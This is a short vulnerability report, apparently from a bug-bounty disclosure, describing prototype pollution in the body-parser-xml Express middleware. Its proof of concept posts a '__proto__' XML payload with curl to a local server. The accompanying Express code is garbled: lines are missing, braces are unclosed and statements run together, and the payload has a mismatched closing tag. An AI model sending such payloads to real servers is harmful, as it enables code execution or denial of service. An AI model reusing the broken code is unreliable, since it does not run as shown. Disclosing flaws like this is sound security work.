Prototype Pollution in fiznool/body-parser-xml

Reported on May 18th 2021

✍️ Description

This library uses an XML parsing library which causes prototype pollution. However, this issue can be fixed on our side.

🕵️‍♂️ Proof of Concept

const express = require('express');
const bodyParser = require('body-parser');


const app = express();
const port = 3001

xmlParseOptions: {
normalize: true, // Trim whitespace inside text nodes
normalizeTags: true, // Transform tags to lowercase
explicitArray: false, // Only put nodes in array if >1
}));"/", (req, res) => {
return res.end("OK")

app.listen(port , () => {
console.log(`Server at http://localhost:${port}`)

Then make a POST request :

curl -X POST http://localhost:3001/ -d "<__proto__><test>ok</testst></__proto__>" -H "Content-Type: application/xml"

💥 Impact

This vulnerability is capable of causing Remote code execution and denial of service attack depending upon how it is used.